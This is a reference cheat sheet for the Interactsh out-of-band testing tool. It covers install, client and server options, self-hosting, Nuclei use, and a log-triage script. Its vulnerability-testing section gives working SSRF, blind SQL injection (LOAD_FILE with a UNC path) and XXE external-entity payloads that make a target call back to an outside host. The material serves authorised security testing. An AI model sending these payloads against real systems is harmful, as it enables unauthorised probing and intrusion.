# Interactsh OOB Interaction Gathering Cheat Sheet
## Overview
Interactsh is an open-source tool developed by Project Discovery for detecting out-of-band (OOB) interactions. It is designed to identify vulnerabilities that cause external interactions, such as Server-Side Request Forgery (SSRF), blind SQL injection, XML External Entity (XXE) injection, and other vulnerabilities that may not be immediately visible through traditional testing methods.
What makes Interactsh unique is its comprehensive approach to OOB testing. Unlike other tools that focus on specific protocols, Interactsh can detect interactions across multiple protocols, including DNS, HTTP(S), SMTP(S), and LDAP. It consists of a server component that captures and logs these interactions and a client component that generates unique test URLs and monitors for any interaction with them.
Interactsh is widely used in security testing to identify vulnerabilities that might otherwise go undetected. It is particularly valuable for bug bounty hunters, penetration testers, and security researchers who need to verify the existence of vulnerabilities that rely on external interactions. The tool is also integrated with Nuclei, another Project Discovery tool, which enables automated vulnerability scanning with OOB detection capabilities.
## Installation
### Client Installation
#### Using Go
```bash
# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
# Verify installation
interactsh-client -version
```
#### Using Docker
```bash
# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest
# Run Interactsh client using Docker
docker run -it projectdiscovery/interactsh:latest client -h
```
#### Using Homebrew (macOS)
```bash
# Install using Homebrew
brew install interactsh-client
# Verify installation
interactsh-client -version
```
#### Using PDTM (Project Discovery Tools Manager)
```bash
# Install PDTM first if not already installed
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest
# Install Interactsh client using PDTM
pdtm -i interactsh-client
# Verify installation
interactsh-client -version
```
### Server Installation (Self-Hosted)
#### Using Go
```bash
# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest
# Verify installation
interactsh-server -version
```
#### Using Docker
```bash
# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest
# Run Interactsh server using Docker
docker run -it projectdiscovery/interactsh:latest server -h
```
## Basic Usage
### Client Usage
```bash
# Start the client with default settings
interactsh-client
# Start the client with verbose output
interactsh-client -v
# Start the client with a specific server
interactsh-client -server your-interactsh-server.com
```
### Server Usage (Self-Hosted)
```bash
# Start the server with default settings
interactsh-server
# Start the server with a specific domain
interactsh-server -domain your-domain.com
# Start the server with verbose output
interactsh-server -v
```
### Output Options
```bash
# Save interactions to a file
interactsh-client -o interactions.log
# Output in JSON format
interactsh-client -json -o interactions.json
# Silent mode (no banner)
interactsh-client -silent
```
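A DNS lookup of the payload hostname is weaker evidence than an HTTP callback, because a resolver, proxy or scanner along the way can resolve a name without the target ever connecting to it. The following added example (not part of the original cheat sheet or the Interactsh project) triages `-json` output on that basis. The field names `protocol` and `unique-id`, the sample records and the `SENT` bookkeeping table are assumptions.

```python
import json

# Constructed records in the shape assumed for `interactsh-client -json` output
# (one JSON object per line; the field names are an assumption, not from this page).
SAMPLE_LOG = """\
{"protocol": "dns", "unique-id": "aaa111", "q-type": "A", "remote-address": "198.51.100.7"}
{"protocol": "http", "unique-id": "aaa111", "remote-address": "203.0.113.10"}
[INF] banner or log text that is not JSON
{"protocol": "dns", "unique-id": "bbb222", "q-type": "A", "remote-address": "198.51.100.7"}
"""

# Hypothetical bookkeeping: which generated ID was placed in which request.
SENT = {
    "aaa111": "GET /fetch?url=...",
    "bbb222": "POST /api (XML body)",
    "ccc333": "GET /search?id=...",
}

def parse_interactions(text):
    """Return the JSON records in text, skipping blank and non-JSON lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("{"):
            continue
        try:
            records.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # truncated or partially written line
    return records

def triage(records, sent):
    """Map each sent test case to the strength of evidence recorded for it."""
    seen = {}
    for rec in records:
        seen.setdefault(rec.get("unique-id", ""), set()).add(rec.get("protocol", "").lower())
    report = {}
    for uid, label in sent.items():
        protocols = seen.get(uid, set())
        if protocols - {"dns"}:
            verdict = "callback"  # something connected to the listener
        else:
            verdict = "resolution-only" if protocols else "none"
        report[label] = (verdict, sorted(protocols))
    return report

if __name__ == "__main__":
    for label, result in triage(parse_interactions(SAMPLE_LOG), SENT).items():
        print(label, *result)
```

A `resolution-only` result is worth re-testing with a second payload before it is reported as a confirmed finding.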
## Client Configuration
### Basic Configuration
```bash
# Set polling interval (seconds)
interactsh-client -poll-interval 5
# Set interaction timeout (seconds)
interactsh-client -interaction-timeout 60
# Enable persistent session
interactsh-client -persistent-session
# Use a specific correlation ID
interactsh-client -correlation-id your-correlation-id
```
### Authentication
```bash
# Use token for authentication
interactsh-client -token your-auth-token
# Use a specific server with token
interactsh-client -server your-interactsh-server.com -token your-auth-token
```
### Filtering
```bash
# Filter interactions by type
interactsh-client -filter-type dns,http
# Filter interactions by IP
interactsh-client -filter-ip 1.2.3.4
# Filter interactions by content
interactsh-client -filter-content "admin"
```
## Server Configuration (Self-Hosted)
### Domain Configuration
```bash
# Set domain for the server
interactsh-server -domain your-domain.com
# Set wildcard domain
interactsh-server -domain your-domain.com -wildcard
# Set IP address to listen on
interactsh-server -ip 1.2.3.4
```
### Certificate Configuration
```bash
# Use Let's Encrypt for certificates
interactsh-server -domain your-domain.com -letsencrypt
# Use custom certificates
interactsh-server -domain your-domain.com -cert cert.pem -key key.pem
```
### Authentication Configuration
```bash
# Enable authentication
interactsh-server -auth
# Set token for authentication
interactsh-server -auth-token your-auth-token
# Set token file for authentication
interactsh-server -auth-token-file tokens.txt
```
## Advanced Usage
### Advanced Client Features
```bash
# Generate a specific number of URLs
interactsh-client -n 5
# Generate URLs with a specific payload
interactsh-client -payload-template "{{random}}.your-domain.com"
# Enable DNS callback only
interactsh-client -dns-only
# Enable HTTP callback only
interactsh-client -http-only
# Enable SMTP callback only
interactsh-client -smtp-only
```
### Advanced Server Features
```bash
# Enable specific services
interactsh-server -dns -http -smtp -ldap
# Disable specific services
interactsh-server -no-dns -no-http -no-smtp -no-ldap
# Set custom ports
interactsh-server -dns-port 53 -http-port 80 -https-port 443 -smtp-port 25 -smtps-port 587 -ldap-port 389
# Enable metrics
interactsh-server -metrics
```
### Payload Generation
```bash
# Generate a URL for testing
interactsh-client -generate-url
# Generate multiple URLs
interactsh-client -generate-url -n 5
# Generate URL with specific server
interactsh-client -generate-url -server your-interactsh-server.com
```
## Integration with Other Tools
### Integration with Nuclei
```bash
# Use Interactsh with Nuclei
nuclei -u https://example.com -t nuclei-templates/
# Use a specific Interactsh server with Nuclei
nuclei -u https://example.com -t nuclei-templates/ -interactsh-server your-interactsh-server.com
# Disable Interactsh in Nuclei
nuclei -u https://example.com -t nuclei-templates/ -no-interactsh
```
### Integration with Notifications
```bash
# Send Interactsh interactions to Discord
interactsh-client|notify -provider discord
# Send filtered interactions to Slack
interactsh-client -filter-type http|notify -provider slack
```
### Integration with Custom Scripts
```bash
#!/bin/bash
# Use Interactsh in a bash script
URL=$(interactsh-client -generate-url)
curl -s "https://example.com/test?url=$URL"
interactsh-client -poll-interval 5 -interaction-timeout 30
```
## Testing for Vulnerabilities
### Testing for SSRF
```bash
# Generate a URL for SSRF testing
URL=$(interactsh-client -generate-url)
# Use the URL in a potential SSRF vulnerability
curl -s "https://example.com/fetch?url=http://$URL/test"
# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30
```
### Testing for Blind SQL Injection
```bash
# Generate a URL for Blind SQL Injection testing
URL=$(interactsh-client -generate-url)
# Use the URL in a SQL query
curl -s "https://example.com/search?id=1' UNION SELECT LOAD_FILE(CONCAT('\\\\',$URL,'\\share'))"
# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30
```
### Testing for XXE Injection
```bash
# Generate a URL for XXE testing
URL=$(interactsh-client -generate-url)
# Create an XML payload with XXE
cat > xxe.xml << EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://$URL/xxe">
]>
<foo>&xxe;</foo>
EOF
# Send the XML payload
curl -s -X POST -d @xxe.xml -H "Content-Type: application/xml" https://example.com/api
# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30
```
## Troubleshooting
### Common Issues
1. **No interactions detected**
```bash
# Increase polling interval
interactsh-client -poll-interval 10
# Increase interaction timeout
interactsh-client -interaction-timeout 120
# Check if the target is behind a firewall
# Try using different protocols (DNS, HTTP, SMTP)
```
2. **Requests**
```bash
# Check if the server is reachable
ping your-interactsh-server.com
# Try a different server
interactsh-client -server oast.pro
# Check if your network allows outbound connections
```
3. **Authentication issues**
```bash
# Verify token
interactsh-client -server your-interactsh-server.com -token your-auth-token -v
# Check if the server requires authentication
```
4. **Server setup issues**
```bash
# Check DNS configuration
dig ns your-domain.com
# Verify that your domain's nameservers point to your server
# Ensure that your server has the necessary ports open
```
### Debugging
```bash
# Enable verbose mode for client
interactsh-client -v
# Enable debug mode for client
interactsh-client -debug
# Enable verbose mode for server
interactsh-server -v
# Enable debug mode for server
interactsh-server -debug
```
## Self-Hosting Guide
### DNS Configuration
To self-host Interactsh, you need to configure the DNS settings of your domain:
1. Register a domain (e.g. `your-domain.com`)
2. Set up NS records for your domain that point to your server:
```
your-domain.com. IN NS ns1.your-domain.com.
your-domain.com. IN NS ns2.your-domain.com.
```
3. Create A records for your nameservers:
```
ns1.your-domain.com. IN A your-server-ip
ns2.your-domain.com. IN A your-server-ip
```
### Server Setup
```bash
# Start the server with your domain
interactsh-server -domain your-domain.com
# Enable Let's Encrypt for HTTPS
interactsh-server -domain your-domain.com -letsencrypt
# Enable authentication
interactsh-server -domain your-domain.com -auth -auth-token your-auth-token
```
### Docker Deployment
```bash
# Create a docker-compose.yml file
cat > docker-compose.yml << EOF
version: '3'
services:
  interactsh-server:
    image: projectdiscovery/interactsh:latest
    command: server -domain your-domain.com -letsencrypt -auth -auth-token your-auth-token
    ports:
      - "53:53/udp"
      - "80:80"
      - "443:443"
      - "25:25"
      - "587:587"
      - "389:389"
    restart: always
EOF
# Start the server
docker-compose up -d
```
## Configuration
### Client Configuration File
The Interactsh client uses a configuration file located at `$HOME/.config/interactsh-client/config.yaml`. You can adjust various settings in this file:
```yaml
# Example configuration file
server: oast.pro
token: your-auth-token
poll-interval: 5
interaction-timeout: 60
filter-type: dns,http
```
### Server Configuration File
The Interactsh server uses a configuration file located at `$HOME/.config/interactsh-server/config.yaml`. You can adjust various settings in this file:
```yaml
# Example configuration file
domain: your-domain.com
ip: 1.2.3.4
letsencrypt: true
auth: true
auth-token: your-auth-token
```
### Environment Variables
```bash
# Set Interactsh client configuration via environment variables
export INTERACTSH_SERVER=oast.pro
export INTERACTSH_TOKEN=your-auth-token
export INTERACTSH_POLL_INTERVAL=5
export INTERACTSH_INTERACTION_TIMEOUT=60
# Set Interactsh server configuration via environment variables
export INTERACTSH_DOMAIN=your-domain.com
export INTERACTSH_IP=1.2.3.4
export INTERACTSH_LETSENCRYPT=true
export INTERACTSH_AUTH=true
export INTERACTSH_AUTH_TOKEN=your-auth-token
```
## Reference
### Client Command Line Options
| Flag | Description |
| --- | --- |
| `-server` | Interactsh server to use |
| `-token` | Authentication token for the server |
| `-n` | Number of URLs to generate |
| `-o`, `-output` | File to write output to |
| `-json` | Write output in JSON format |
| `-v`, `-verbose` | Show verbose output |
| `-debug` | Show debug information |
| `-poll-interval` | Polling interval in seconds |
| `-interaction-timeout` | Interaction timeout in seconds |
| `-persistent-session` | Enable persistent session |
| `-correlation-id` | Correlation ID for the session |
| `-filter-type` | Filter interactions by type (dns, http, smtp, ldap) |
| `-filter-ip` | Filter interactions by IP |
| `-filter-content` | Filter interactions by content |
| `-generate-url` | Generate URL for testing |
| `-dns-only` | Enable DNS callback only |
| `-http-only` | Enable HTTP callback only |
| `-smtp-only` | Enable SMTP callback only |
| `-ldap-only` | Enable LDAP callback only |
| `-payload-template` | Custom payload template |
| `-version` | Show Interactsh client version |
### Server Command Line Options
| Flag | Description |
| --- | --- |
| `-domain` | Domain to use for the server |
| `-ip` | IP address to listen on |
| `-wildcard` | Enable wildcard domain |
| `-letsencrypt` | Use Let's Encrypt for certificates |
| `-cert` | Path to certificate file |
| `-key` | Path to key file |
| `-auth` | Enable authentication |
| `-auth-token` | Authentication token |
| `-auth-token-file` | File containing authentication tokens |
| `-dns` | Enable DNS service |
| `-http` | Enable HTTP service |
| `-smtp` | Enable SMTP service |
| `-ldap` | Enable LDAP service |
| `-no-dns` | Disable DNS service |
| `-no-http` | Disable HTTP service |
| `-no-smtp` | Disable SMTP service |
| `-no-ldap` | Disable LDAP service |
| `-dns-port` | Port for DNS service |
| `-http-port` | Port for HTTP service |
| `-https-port` | Port for HTTPS service |
| `-smtp-port` | Port for SMTP service |
| `-smtps-port` | Port for SMTPS service |
| `-ldap-port` | Port for LDAP service |
| `-metrics` | Enable metrics |
| `-v`, `-verbose` | Show verbose output |
| `-debug` | Show debug information |
| `-version` | Show Interactsh server version |
### Supported Interaction Types
| Type | Description |
| --- | --- |
| `dns` | DNS interactions |
| `http` | HTTP/HTTPS interactions |
| `smtp` | SMTP/SMTPS interactions |
| `ldap` | LDAP interactions |
## Resources
- Official documentation
- GitHub repository
- Project Discovery Discord

---
*This cheat sheet provides a comprehensive reference for using Interactsh, from basic client and server usage to advanced configuration and integration with other tools. For the most up-to-date information, always refer to the official documentation.*